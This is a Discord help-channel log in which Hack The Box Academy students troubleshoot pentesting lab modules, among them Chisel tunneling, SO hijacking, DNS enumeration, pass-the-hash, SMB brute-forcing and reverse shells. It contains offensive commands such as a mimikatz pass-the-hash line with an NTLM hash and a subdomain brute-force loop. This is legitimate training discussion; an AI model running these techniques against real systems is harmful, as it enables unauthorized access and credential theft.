novel lynx
#

PIVOTING, TUNNELING, AND PORT FORWARDING/SOCKS5 Tunneling with Chisel. Is this another issue with using pwnbox?? ubuntu@WEB01:~$ ls
chisel
ubuntu@WEB01:~$ ./chisel server -v -p 1234 --socks5
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.32' not found (required by ./chisel) ./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./chisel)

unique ether
#

Nvm I solved I'm so dumb bro

#

💀

novel lynx
novel lynx
#

but how do i know which one to download?

#

pivot host is running OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

cloud urchin
#

just by trial and error

#

i used 1.7.4

novel lynx
#

would this be a good candidate? chisel_1.10.0_linux_386.deb

cloud urchin
#

just go to their releases on github

#

that's 1.10.0... like it says in the file name. cmon bruh.

novel lynx
#

i really don't mean to be asking dumb questions, but also I def have a gaping knowledge hole for downloading stuff on my own, like right now i followed the chisel git link they provided, navigated to what i think is different versions, but there are like 85 different links and they all start with chisel_1.10.0 and at the top there is a green tag that says "latest"

cloud urchin
#

yeah, those are the installers/executables for various operating systems. you need to go to releases and find 1.7.6

#

are you on the pwnbox?

novel lynx
#

yes, on the pwnbox

cloud urchin
novel lynx
#

i found the releases section at least, that was my problem, i will try the link you provided

cloud urchin
#

it'll be important to know where to get downloads on github, how to compile stuff yourself, and how to download stuff from there. many PoC's use github

novel lynx
#

ya it's definitely something i need more practice with, i usually just cross my fingers that the links work that htb provides

#

so do i not need to go build with that link? ls
cacert.der Desktop Downloads Music Public Videos
chisel_1.7.4_linux_amd64 Documents go Pictures Templates

cloud urchin
#

nope

novel lynx
#

interesting, sometimes (most times) i don't even know what i don't know

#

so when i use that link and others, it downloads what looks to be a singular file that i need to gunzip, but with the provided htb link it downloaded a package with a bunch of different things. I tried it anyway and got this: ubuntu@WEB01:~$ ls
chisel_1.7.4_linux_amd64
ubuntu@WEB01:~$ ./chisel server -v -p 1234 --socks5
-bash: ./chisel: No such file or directory

cloud urchin
#

what does the error say

novel lynx
#

bash: ./chisel: No such file or directory ??

cloud urchin
#

so you just unzipped a file right.. maybe type ls to see the file name

novel lynx
#

ubuntu@WEB01:~$ ls
chisel_1.7.4_linux_amd64

cloud urchin
#

when you use ./ it calls to the directory you're in, do you see a "chisel" file name?

novel lynx
#

what i'm saying is it downloaded that single file, instead of a package

#

chisel_1.7.4_linux_amd64 is the file name

cloud urchin
#

is it a folder or file name

novel lynx
#

file

cloud urchin
#

so instead of ./chisel, what do you think you should put?

shut quest
#

./chisel_1.7.4_linux_amd64

You might need to chmod +x chisel_1.7.4_linux_amd64

novel lynx
#

nah

#

command not found

novel lynx
#

sudo ./chisel_1.7.4_linux_amd64 server -v -p 1234 --socks5
[sudo] password for ubuntu:
sudo: ./chisel_1.7.4_linux_amd64: command not found

cloud urchin
#

make sure it's not a folder and chmod +x like gubarz said

#

protip: tab autocompletes, so you can just start typing ./ch and hit tab

shut quest
#

file chisel_1.7.4_linux_amd64

novel lynx
#

and @shut quest

novel lynx
#

got the flag ❤️

pseudo kiln
#

I am a bit confused by the Shared Object Hijacking in linux priv esc. Like if I run the binary it automatically drops me to root....requiring me to do nothing. Also .so library is not even writeable, in the module the author shows how to exploit by overwriting it. What's going on ?

#

like whats the whole point of the question/exercise if it just works with no intervention ?

shut quest
pseudo kiln
#

Bro, the module itself does not even correlate with the environment in the lab. Practice what ? In the module he overwrites the shared library, but in the environment we do not have write permission on it

#

practice what ? library is not even writeable like they show it. What example to recreate ?

oak lance
#

Most of the files were installed by pip but not all

shut quest
cloud urchin
#

yeah, the directory is definitely writable

pseudo kiln
#

yeah, but now I have create my own payroll binary and set RUNPATH during gcc compilation, then try to exploit it ?

#

honestly there is barely one paragraph of explanations for this section, hacktricks shows it more detail and actually explains it, very dissapointed with linux lpe module overall

cloud urchin
#

i really liked the hijacking parts

pseudo kiln
#

the concept is interesting, the way the author explains in this section is bad, whole section has less than 50 words I think

#

actually you cannot even recreate the example in the module

uncut ocean
#

why this is not working i am using pwnbox

pseudo kiln
#

you have to compile the payload.c into a new binary and link it with dsquery, but then you cannot set SUID on the compiled binary and change owership to root

dim wolf
shut quest
#

If you just here to bitch about it, no one cares. If you want to foster growth for the module/community leave some /feedback and provide some positive criticism about the section.

uncut ocean
# dim wolf sqsh isn't installed

lol i didnot like this specific module Attacking Commom Services there is no point for putting this module as we already studie the port enum at starting module and the labs are absolutely not good that FTP challenge out of 10 , 8 times it didnot shows that port and in this sql attack module the sqsh command are not working properly

dim wolf
#

sqsh is for MSSQL, right?

#

it doesn't work for me. i used mssqlclient.py instead

uncut ocean
pseudo kiln
uncut ocean
dim wolf
#

yea they are different tools, so you'll have to learn the syntax. mssqlclient.py is an impacket script, so it shouldn't be too hard to figure out

shut quest
dim wolf
#

the MSSQL commands will obviously be the same though

limber river
#

mssqlclient automate enabling xp_cmdshell

limber river
#

so it's easier to use

dim wolf
#

seems more convenient that easier

safe star
#

Xoriath asks the realest questions 😹

gusty cloak
drifting grail
#

Hi everyone, currently stuck on Advanced XSS and CSRF Exploitation skills assessment where I managed to extract the admin.php page and find the hidden API but keep getting ||{"error":"Please specify a customer ID"}||, tried fuzzing bunch of params but none worked, any hints? Managed to solve, DM if help required

pseudo kiln
gusty cloak
cloud urchin
grand loom
#

dumb question but

#

how do i execute my notification

shut quest
grand loom
shut quest
#

which one?

grand loom
wet aspen
#

guys i got the credentials for alex in Footprinting Lab - Medium.. tried everything through rdp to find the other user for mysql login... but am stuck here

#

anyone have done this lab before ?

grand loom
#

Nvm figured it out

drifting grail
full patio
# full patio https://academy.hackthebox.com/module/112/section/1069 I am working on this modu...

I'm still struggling on this one.

I've tried:
||1. dnsenum --dnsserver 10.129.203.140 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt internal.inlanefreight.htb
2. dnsenum --dnsserver 10.129.203.140 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt app.inlanefreight.htb
3. dnsenum --dnsserver 10.129.203.140 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt ns.inlanefreight.htb
4. dnsenum --dnsserver 10.129.203.140 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt mail1.inlanefreight.htb

Also tried:
┌─[eu-academy-1]─[]─[htb-ac-537556@htb-bwgchqgqcu]─[~]
└──╼ [★]$ for sub in $(cat /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt );do dig $sub.internal.inlanefreight.htb @10.129.203.140 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
┌─[eu-academy-1]─[]─[htb-ac-537556@htb-bwgchqgqcu]─[~]
└──╼ [★]$ for sub in $(cat /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt );do dig $sub.app.inlanefreight.htb @10.129.203.140 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
┌─[eu-academy-1]─[]─[htb-ac-537556@htb-bwgchqgqcu]─[~]
└──╼ [★]$ for sub in $(cat /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt );do dig $sub.ns.inlanefreight.htb @10.129.203.140 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
||

Can anyone point me in the right direction? 🤕

autumn pilot
#

there are more than the 3 subdomains you have showcased in your example

pliant coyote
wary plover
# pliant coyote why?

might be a longshot but is there a space between MS and I? my eyes could also be misconfigured

pliant coyote
#

There are no spaces.

#

It's driving me crazy.

ruby ginkgo
#

Try to use -force

dim wolf
#

find Write-UserAddMSI in the PS module to see if it's actually there. could have been renamed

pliant coyote
#

I imported the wrong script, my mistake.

stark lark
#

Can someone do sanity check for my AEAD Skills Assesment 1? Having problems with msfconsole/socket

unique ether
#

Find an interesting file

#

After you rdp

limpid hemlock
#

Hey anyone got errors installing droopescan to solve joomla disvovery enumeration section

acoustic owl
twilit epoch
#

Is there anyone I can PM for help with regards to Windows Privilege Escalation Skill Assessment I ?

placid edge
#

Just send it here

twilit epoch
#

I am not able to get a foothold, can you give me a nudge?

#

Im unsure of how to use command injection to get back a reverse shell

#

I tried to upload to the victim via certutil -urlcache -f but it always returns an error

lime imp
#

what is the difference between Pass the Hash and Pass the Keys?
i've got ntlm hash of a domian joined user and got access to his share on the domain, so i can also use Pass the keys, which is actually the hash i will send to the KDC, then what is the difference?

#

in the module, after gettingg the keys, we perform pass teh key as:

mimikatz # sekurlsa::pth /domain:inlanefreight.htb /user:plaintext /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f
#

see here we also used ntlm, so how is it different

placid edge
#

usure what you mean by pass the key

#

like pass the ticket?

#

i guess the difference lays in authentication and authorization

placid edge
#
The Overpass The Hash/Pass The Key (PTK) attack is designed for environments where the traditional NTLM protocol is restricted, and Kerberos authentication takes precedence. This attack leverages the NTLM hash or AES keys of a user to solicit Kerberos tickets, enabling unauthorized access to resources within a network.

A Pass-the-Hash (PtH) attack is a technique where an attacker captures a password hash (as opposed to the password characters) and then passes it through for authentication and lateral access to other networked systems. With this technique, the threat actor doesn’t need to decrypt the hash to obtain a plain text password. PtH attacks exploit the authentication protocol, as the passwords hash remains static for every session until the password is rotated.
#

honestly it looks a lot like ptt

#

but if anyone can explain it better let me know

lime imp
#

i think it is like authentication that, the domain joined user knows his authentication and encrypts the timestamp with his password hash and then the key is what we send to kdc to autheticate ourself, it is sooo similar to pas the hash

placid edge
#

In an overpass-the-hash attack, an adversary leverages the NTLM hash of a user account to obtain a Kerberos ticket that can be used to access network resources.

#

its a different thing, pth doesnt touch kerberos so its simply a way to authenticate, where overpass-the-hash or ptk you can create or forge tickets based on the ntlm hash and abuse the authorization

#

if that makes sense

lime imp
#

hmm makes a lot sense

placid edge
#

This video explains what a Pass the Hash attack is and demonstrates how an attacker can leverage the LanMan or NTLM hash of a user’s password to authenticate to a directory or resource without ever obtaining the user’s plaintext password.
To learn more about this attack and how to mitigate, detect and respond to it, go to: https://www.netwrix.co...

▶ Play video
#

i might be really wrong and dont quote me, but thats what i got from the blogs i've read so far

placid edge
#

deleted above messages because i caught myself trying explain things in different ways leading to the same result 😒

twilit epoch
#

Can anyone give a nudge with regards to gaining a reverse shell through the command injection flaw in Windows Privilege Skills Assessment I ?

placid edge
#

what have you tried?

#

like your not giving a lot of info about it

twilit epoch
#

so I know that it is vulnerable to the ||&&|| and tried to use certutil to upload ||nc.exe|| but it does not work

#

I have also tried various shells from revshells but it does not execute

placid edge
#

if you have rce why not use a powershell reverse shell?

twilit epoch
#

i didnt think about that

rustic sage
#

cant sign into greenbone | module: vulnerability assessment | section: OpenVAS assessment skills

#

oh oops i see why LOL

brave creek
#

Hi, I have a question about the "Getting Started" module of the "Penetration Tester" path. The problem is that the web page doesn't load. I think it has to do with the configuration of /etc/hosts but I don't quite understand what's going on. Does anyone have any idea?

placid edge
#

or what you have in there

#

it might be an issue with the spacing of the ip and domain name

brave creek
#

I cannot send screenshot

127.0.0.1 localhost
127.0.1.1 debian12-parrot

The following lines are desirable for IPv6 capable hosts

::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 localhost
127.0.1.1 htb-yfgfxasr0l htb-yfgfxasr0l.htb-cloud.com

rustic sage
#

so 127.0.1.1 is the IP, debain12-parrot is the host. example:

10.129.92.5 http://www.hackthebox.com/

now if you navigate to "http://hackthebox.com/" it'll be responsive on google

#

this is just an example URL varies on what your machine tells you to go to

brave creek
#

and how can i know de domain? they only give me this 94.237.60.34:39332

quartz chasm
#

is this the right channel to ask for help on questions?

brave creek
#

Does it have anything to do with this data? -> Connected to htb-yfgfxasr0l:1 (htb-ac-1463051)

rustic sage
grand portal
#

Module: Information Gathering- web edition
Section: Subdomain enumeration

Brute-force vhosts on the target system. What is the full subdomain that is prefixed with "web"? Answer using the full domain, e.g. "x.inlanefreight.htb"

I've tried:

  1. ran command gobuster vhost -u http://83.136.255.40:35863 -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain inlanefreight.htb
  2. edited etc/hosts file and put the <generated ip without port number> inlanefreight.htb
  3. the command produces no result
rustic sage
#

on your google, make sure you're connected to the openvpn config too

rustic sage
#

see if a domain comes up

brave creek
rustic sage
quartz chasm
#

sorry it just said discussing modules i wasnt sure if there was a dedicated questions one

rustic sage
#

time to time someone will be here to assist

brave creek
rustic sage
#

file extension is ".ovpn"

#

make sure thats running

#

send an ss of your host file, what's inside it?

sacred jacinth
rustic sage
brave creek
acoustic owl
rustic sage
#

payloadbunny is a fire user

sacred jacinth
brave creek
#

nono

sacred jacinth
#

which section is it exactly?

rustic sage
brave creek
unique salmon
#

Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host.

tough condor
#

can i know what are the first modules to begin with?

unique salmon
#

Any advice?

sacred jacinth
#

did the section teach you anything about it? ||Hint: it did||

unique salmon
#

,

sacred jacinth
tough condor
#

alright thanks

grand portal
unique salmon
#

Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host.

#

Any advice I did not understand the question

brave creek
fading perch
#

Stuck in attacking common applications section attacking gitlab q2 gain rce

tried fond the user name tried password spraying password bruteforce created the new user .
Unable the guess the password for the user and with the created account can't get the rce

quartz chasm
#

anyone know how to fix this "Job for ssh.service failed because the control process exited with error code.
See "systemctl status ssh.service" and "journalctl -xeu ssh.service" for details."

quaint current
#

Module: Footprinting
Section: IPMI

Question: What is the account's cleartext password?

So I have used metasploit setting the OUTPUT_HASHCAT_FILE and get a ipmi_hash.hash, which is nice. Then I do,

||hashcat -m 7300 -a 0 /tmp/ipmi_hash.hash /usr/share/wordlists/rockyou.txt --user ||

And: * Device #1: Not enough allocatable device memory for this attack.

😢

fading perch
marsh echo
fading perch
marsh echo
#

ok now use the default password provide on the section

#

Once you've found the common password*, use these credentials for your rce with the Poc gitlab_13_10_2_rce.py

red dragon
#

can anyone tell in HTB ctf i want to participate in upcoming ctf but it ask for input key what is that??

fading perch
patent jungle
#

Hey guys, currently on Module 7 - Password attacks, attacking NTDS.dit section. I'm a bit confused with this line:

To make a copy of the NTDS.dit file, we need local admin (Administrators group) or Domain Admin (Domain Admins group) (or equivalent) rights.

But when I search online whether its possible to make a copy of NTDS.dit with only local admin rights, it shows Access to ntds.dit is highly restricted because it contains sensitive data, including hashed passwords. Only domain administrators or those with equivalent privileges, such as system administrators on a domain controller, would be able to interact with the ntds.dit file.

fading perch
marsh echo
shut vapor
# patent jungle Hey guys, currently on Module 7 - Password attacks, attacking NTDS.dit section. ...

What is your question; is it confusion between which is necessary to access NTDS.dit: Local Admin vs Domain Admin? As I understand it, there is no distinction between "local" and "domain" authentication after you upgrade a server to become a domain controller. Local authentication on a DC becomes functionally equivalent to authenticating through the domain, you're just doing it locally instead of accessing the DC over a network.

patent jungle
#

not the domain controller

shut vapor
marsh echo
patent jungle
#

never thought of that CH_CatStupid

#

thanks!

fading perch
marsh echo
cedar zinc
#

web fuzzing - skill assesment - Question "After completing all steps in the assessment, you will be presented with a page that contains a flag in the format of HTB{...}. What is that flag?" - Did a simple FUZZ scan Found 4 dir ( htpasswd 403, hta 403, htaccess 403, admin 301, server-status 403 ) so its admin (permission declined) - tried Fuzzing /admin - found (hta, htpasswd, htaccess, index.php) so its index.php - "ACCESS DENIED" - tried fuzzing /index.php - everything is valid ?? - tried filtering everything - no responce ? - what am i doing wrong ??? _ plz help ( its suggested to use common.txt )

#

There is only one question in skill assassment

#

YO !! Help plz ??

quiet trout
#

not sure what module you're on but did you try fuzzing headers? request body data, etc?

#

we're talking ffuf right? @cedar zinc ^

marsh echo
#

I didn’t do it is section but with ffuf you can try to find repertoire recursively -recursion -recursion-depth -1 -e .php

cedar zinc
patent jungle
#

Hi, I'm unable to bruteforce SMB using hydra (apparently because it doesn't support smb2?) Any other alternatives?

shut vapor
marsh echo
patent jungle
#

but pretty slow, even with 64 threads

shut vapor
#

That can often be the server slow to respond. Sometimes I try other services in tandem to see if they're faster since creds are shared.

patent jungle
#

btw, do u use netexec instead of hydra

#

this tool seems better

shut vapor
#

I use both, but netexec does seem better in a few ways.

#

Use them interchangeably and you'll develop a preference for one tool or another that largely depending on what you're doing at the moment.

patent jungle
#

okay, thanks a lot again :)

quaint current
marsh echo
marsh echo
wary plover
silver cargo
#

i'm experiencing network problem with "The learning process module" , i am connected to the VPN server, but whenever i try to exploit the machine using my attacking machine, the target will crash or disconnect. any solution?

marsh echo
#

you have to download the vpn in tcp mode

west sentinel
#

Currently having trouble with a question in the linux fundamentals module.
I'm need to list all services and the interfaces they listen on, most provided networking commands on the cheatsheet (I've tried lsof, ifconfig, ss, ps) do not provide enough information.
Any advice, linux power users?

west sentinel
#

hmm, no interfaces

#

i presume in that context they are talking about something like eth0, ens192, lo, right?

marsh echo
#

with lsof you can use lsof -i -P -n

west sentinel
#

yeah already tried that from an internet guide, unfortunately need sudo to do that

next bronze
marsh echo
west sentinel
west sentinel
next bronze
#

0.0.0.0 is the ip for all interfaces

west sentinel
#

yep, though i feel like the next question sort of flows from first... and you need to identify the user behind the FTP server

west sentinel
astral steppe
west sentinel
#

why remove everything with 127?

astral steppe
#

localhost ip

west sentinel
#

huh

#

and what does stuff like "tunap" or "punta" or "ln4" even mean?

next bronze
#

why not google it

astral steppe
#

idk about the rest, im quite new aswell, just started fundamentals and on networking (but I have been a software engineer for about a year now), -ln4 merges the -l for listening and -n numeric flags to list services listening with numeric addresses using ipv4

west sentinel
#

hot damn

marble island
#

Hello guys i am doing the AD Enumeration and attacks skills assessment, i have a meterpreter shell on a host on the AD internal network, i need to figure out access to a host named "MS01" , i tried starting a socks proxy and nmap the network (proxychains nmap -Pn -sV -sC 172.16.6.0/244 -p 139,445) and it gave me nothing, how do i figure out which host is MS01 (i did a arp-scan using meterpreter and it showed that there is only 3 hosts, 1 is mine, the other one is probaly MS01 and the other is the DC.,, i wanna know how would i figure this out if there where many hosts?)

median gale
#

Passwrod Attacks | Pass the ticket form linux. Both Julio's tickets expires in 2022 and the system date is set to 2024

shut vapor
#

It's easy to goof setting the environ and accidentally check one ticket twice.

fresh patrol
#

I am stuck and I am not sure how to get around it. Apart from crackmap, is there a way I could get around it or is there specific version of crackmap that I should use. I am aware that I can use the id_rsa; however, it seems that I need to login with jason account in order to log in

#

Attacking common services smb

median gale
shut vapor
shut vapor
median gale
#

Cheers brother thanks a lot

shut vapor
fresh patrol
#

oh yes I downloaded the password list

#

I can't paste a photo here

#

password list from the resources

#

😦

shut vapor
#

Ok, good. It sounds like you know what you need to do... now how are you going to do it? If you have a question, lmk.

#

Also, if you haven't followed the directions in #welcome that's why you can't paste screenshots.

#

I can't say with certainty that they restrict images, but I'm guessing it's a restriction for new users until they agree to the rules & link their account.

fresh patrol
#

oh thank you so much sorry I am a little new with discord

shut vapor
#

it's ok. get linked up and ask any questions.

storm elk
fathom pendant
#

Did you add it to your /etc/hosts?

fresh patrol
#

thank you 😄

#

settled already

#

I am stuck with attacking SMB part, not sure if my crackmap version is a wrong one

#

I tried hydra but can't

fathom pendant
#

Also that's not the domain anyway

#

Also highly suggest using netexec instead of crackmap

fresh patrol
#

I was using local-auth cos I am aware it is a workgroup

#

but not sure why

#

they crack it with -d

#

so I tried my luck

fathom pendant
novel lynx
#

PIVOTING, TUNNELING, AND PORT FORWARDING/ICMP Tunneling with SOCKS. So I had the same problem with the previous module last night where the provided download git link isn't compatible with the target box (am using pwnbox). I'm getting this error: ./ptunnel-ng: error while loading shared libraries: libcrypto.so.3: cannot open shared object file: No such file or directory. So I think I need to find a compatible version of ptunnel. What's the best way to go about doing this? like what am i looking for to match the download version to the target host?

fathom pendant
#

Also that's not an article, just an example from the module

fresh patrol
#

oh amazing

fresh patrol
#

i will try it

fathom pendant
#

Also you can provide a wordlist to the -u option

#

Instead of individually trying usernames

median gale
novel lynx
fathom pendant
#

Isn't the task to connect to //DC01/julio?

median gale
fathom pendant
#

Not C$

#

:)

median gale
#

Like this ?

fathom pendant
#

Also: don't use -c

median gale
#

Its what the module uses but why not ?

fathom pendant
#

Just see what happens

#

Also it may be that the ticket you're using is invalid

#

The example doesn't always mirror what you can or can't do

median gale